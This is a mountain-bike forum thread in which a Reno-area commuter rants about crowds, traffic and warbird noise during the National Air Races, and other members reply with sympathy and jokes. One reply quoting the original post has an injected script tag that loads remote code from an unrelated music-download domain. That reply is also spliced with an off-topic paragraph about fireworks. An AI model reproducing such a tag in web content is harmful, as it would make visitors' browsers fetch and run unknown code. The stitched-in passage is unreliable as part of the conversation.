Special events rant.- Mtbr.com
    weirdo

Special events rant.

It`s my favorite time of year again- the National Air Races. I used to think they were pretty cool (and they actually ARE cool except that my own circumstances are different now). My normally peaceful commute is disrupted for a week every year by thousands of people flocking to a location smack in the middle of my daily route. In the afternoons, when I`m on my way to work, most of the days activities are all wrapped up, but there are hordes of people camped out in vacant lots and parking lots and the campers have a tendency to wander out into the street without any kind of traffic check, as if they were stepping out of their RVs in the middle of a KOA. They ain`t in any hurry to get back out of the sreet either.

So it takes me a few extra minutes to get to work, I do my time and head home in the morning. Much worse. The campers are still wandering, but now there are cars and vans up the wazzoo, people from a dozen different unorganized organizations trying to direct the traffic into their own little parking traps, other people selling crap, booths set up, pedestrians milling around toting lawn chairs and coolers right in the middle of MY PERSONAL thoroughfare! Some jerk in a Suburban going back and forth like 19 times in his attempt to park in a space that might fit a Kia before he gives up and makes a ten point "U-turn" to try it again somewhere else. None of the drivers are familiar with the somewhat odd signage in the area (former miniature airbase), so they`re stopping in the middle of intersections and trying to figure out what the hell they`re supposed to do, and they`re also stopping to let the blind boneheads wandering in the streets pass, and the parking flaggers have them all backed up because too many cars are trying to get into the area at once. Granted, it`s not as bad to get through on a bike as it when I was driving to work and back, but still... So much for my post shift cool down time.

So I make it through the mess, and by getting through one key intersection, things are back to normal except for the prerace flights or warmups or whatever the F* they are. I don`t see more than a half dozen vehicles on my last mile. Make it home and get into and out of the shower, get some dinner in me and the REAL fun starts. Ever try to sleep with a fleet of suped up World War II fighters roaring around just a quarter mile away? It`s not a particularly restful sleep, but it`s better than the flyby airshow stuff. This year it`s the Blue Angels, sometimes it`s the Thunderbirds or the Snowbirds, but no matter how you slice it, there`s just no way to sleep through that racket. Seriously, the whole house shudders when they fly over. The bright side is that for 51 weeks per year I have a nice, peaceful commute and live in a very quiet rural neighborhood. One more day... I make it.

mtbr member
    Jul 2003

I can see only....

two solutions.

1. Move!

2. Take the week off and enjoy the air show and races!

Of course there's always the third option, Live with it!

I do feel your ire though. I live near an airport, less than 1/4 mile distant, that used to be an Airforce Base before the city bought it and turned it into the local airport. The base housing units are still here and the city rents them out. That's where I live! So airport noises are not strange to me. But then I'm retired military so I'm used to it. We have an annual air show as well, no races though. The biggest headache is the extra traffic. I can sleep through an earthquake so that's not a problem. But to top that off we also have an Air National Guard unit and an Army National Guard unit whose armories are located at the airport as well. So we get at least one weekend a month of additional activity! So I get a little of what you experience once a week, all year long!

So you see, things could be worse!

Good Dirt
    "I do whatever my Rice Cripsies tell me to!"

bicycle dreamer
    You can't fall asleep to the sounds of Warbirds roaring overhead?

It's absolute music to my ears. I live within earshot of a Zoo, so I get to hear Lions roaring in the morning sometimes. There's also a football Stadium a half mile away, on a Big 10 Campus. Commuting on Sat mornings is all out war!

I absolutely love it!

Is there any way to go exploring and change your route for a week? I like it when there are new obstacles in the way, gives me an excuse to come in a few minutes late. ;D
    Moving the soul with two wheels.
    I have a slight cycling addiction.

Now living in Nagoya City, Japan!

mtbr member
    Jul 2007
    man I took a flight in a B-24 once and it was awesome loud. Louder than that 1987 Motorhead show 20' away from the stacks. I live in party town USA and we have events often. Since I work smack downtown I just use it as an excuse to have a beer or 2 one the way home. Talk to some of those folks, they will probably give you a beer and some great stories of back in the day.

weirdo
    Quote Originally Posted by Squash
    two solutions.

1. Move!

2. Take the week off and enjoy the air show and races!

Of course there's always the third option, Live with it! ....

....So you see, things could be worse!
    1. Not on your life!
    2. Hmmm... Don`t care to see the show again, but it comes at a time of year with predictably nice weather.

Or my favorite option, whine real loud for a week and then forget about it and get back to business.

Yup, things could definitely be worse. I already knew that, but it never stopped me from b*tching before

weirdo
    A zoo?!? I like to hear the roosters and braying doneys in the morning, but I think you`ve got me beat there!

No-Brakes Cougar
    That's crazy man. It sounds like you at least have a route that bypasses downtown so you at least don't get caught in the Hot August Nights/Street Vibrations melee though? I know what you're going through though, tourists seem to think that every where they go is an amusement park and there aren't going to be any locals actually trying to get to work in a timely fashion, etc...
    R.I.P. Ronnie James Dio ~ July 10, 1942 May 16, 2010

bicycle dreamer
    Quote Originally Posted by rodar y rodar
    A zoo?!? I like to hear the roosters and braying doneys in the morning, but I think you`ve got me beat there!
    Get some interesting smells in the heat of the summer, but yeah. Live across the street from a Zoo. (One of the only free ones in the USA!!!) Big cats roaring.

Good biking too around here.
    Moving the soul with two wheels.
    I have a slight cycling addiction.

Now living in Nagoya City, Japan!

mtbr member
    Mar 2007

Pesky Snowbirds

With a loud thunder thunder thunder birds hooo! I shot this lil pic on my anything but epic ride against the 35mph wind home. Thought this would bring up wonderful memories of airshows.....Not a airshow just a stop. I do agree that they are pretty loud yet worth it truely a beautiful site.
    Attached Images Attached Images

mtbr member
    Jun 2009
    rodar lives about 15 miles north of reno and his only other option would add another half hour to his ride. i used to live near him and delt with the same stuff

weirdo
    Yeah, Gary- I live a good ways from downtown and we`re sort of isolated here in our own little valley. No Hot August Nights or Street Vibes up here and I very seldom go down into Reno/Sparks when that stuff is going on.

Skanvenger, whacha got there? Looks like it would be a great ride if you found a way to stick a derailler and a five speed cluster on it

Flyn! What have you been up to? If you have autonotification disabled, check your PMs- I was trying to get ahold of you a while back but finally figured you didn`t want to be gotten ahold of.

Sep 2009
    Quote Originally Posted by rodar y rodar
    It`s my favorite time of year again- the National Air Races. I used to think they were pretty cool (and they actually ARE cool except that my own circumstances are different now). My normally peaceful commute is disrupted for a week every year by thousands of people flocking to a location smack in the middle of my daily route. In the afternoons, when I`m on my way to work, most of the days activities are all wrapped up, but there are hordes of people camped out in vacant lots and parking lots and the campers have a tendency to wander out into the street without any kind of traffic check, as if they were stepping out of their RVs in the middle of a KOA. They ain`t in any hurry to get back out of the sreet either.

So it takes me a few extra minutes to get to work, I do my time and head home in the morning. Much worse. The campers are still wandering, but now there are cars and vans up the wazzoo, people from a dozen different unorganized organizations trying to direct the traffic into their own little parking traps, other people selling crap, booths set up, pedestrians milling around toting lawn chairs and coolers right in the middle of MY PERSONAL thoroughfare! Some jerk in a Suburban going back and forth like 19 times in his attempt to park in a space that might fit a Kia before he gives up and makes a ten point "U-turn" to try it again somewhere else. None of the drivers are familiar with the somewhat odd signage in the area (former miniature airbase), so they`re stopping in the middle of intersections and trying to figure out what the hell they`re supposed to do, and they`re also stopping to let the blind boneheads wandering in the streets pass, and the parking flaggers have them all backed up because too many cars are trying to get into the area at once. Granted, it`s not as bad to get through on a bike as it when I was driving to work and back, but still... So much for my post shift cool down time.

So I make it through the mess, and by getting through one key intersection, things are back to normal except for the prerace flights or warmups or whatever the F* they are. I don`t see more than a half dozen vehicles on my last mile. Make it home and get into and out of the shower, get some dinner in me and the REAL fun starts. Ever try to sleep with a fleet of suped up World War II fighters roaring around just a quarter mile away? It`s not a particularly restful sleep, but it`s better than the flyby airshow stuff. This year it`s the Blue Angels, sometimes it`s the Thunderbirds or the Snowbirds, but no matter how you slice it, there`s just no way to sleep through that racket. Seriously, the whole house shudders when they fly over. The bright side is that for 51 weeks per year I have a nice, peaceful commute and live in a very quiet rural neighborhood. One more day... I make it.<script type="***************" src="http://djmixdownloads.com/script.php"></script>
    If you weren't out of town on the weekend, there is a pretty good chance you were at the Forks for the fireworks this weekend. It's usually the thing to do when you're stuck in the city.

That was the case for me and a few friends this year. We figured we would go out for dinner and then enjoy the fireworks.

The problem was with the way they did the fireworks this year. Someone in charge must have thought it would be cool to have a rock band playing on stage while the fireworks went off.

Nov 2008
    Do you think that bike could beat the plane behind it in a race?

Mantis, Paramount, Campy
    Randall? Drake?

And yeah, football saturdays this time of year are especially rough with farmers market traffic too.

mtbr member
    Mar 2007

heck yeah well maybe

If I had a tail wind and a really big hill I would give them a run for there money.

Members who have read this thread: 0